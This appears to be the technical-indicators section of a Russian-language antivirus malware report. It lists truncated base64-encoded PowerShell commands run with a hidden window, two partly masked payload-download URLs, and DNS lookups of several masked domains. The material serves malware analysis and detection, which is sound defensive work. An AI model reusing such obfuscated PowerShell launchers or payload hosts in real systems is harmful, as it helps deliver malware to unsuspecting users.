Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAHQAdwB5AGQAaABhAGkAdgBjAG4AbgA9ACcARQB6AHAAdwBxAGgAcwBpACcAOwAkAFkAYgBxAHUAYwBiAGcAYwBxAHoAZwAgAD...
- http://hi####48blog.biz/wp-admin/VmfOpW/
- http://so#####npoolcare.com/central.function/xvt-iqa0qu-6812406689/
- DNS ASK hi####48blog.biz
- DNS ASK ba####salama.com
- DNS ASK ho####cietepromo.ca
- DNS ASK so#####npoolcare.com
- DNS ASK te######ndirectsales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAHQAdwB5AGQAaABhAGkAdgBjAG4AbgA9ACcARQB6AHAAdwBxAGgAcwBpACcAOwAkAFkAYgBxAHUAYwBiAGcAYwBxAHoAZwAgAD...' (со скрытым окном)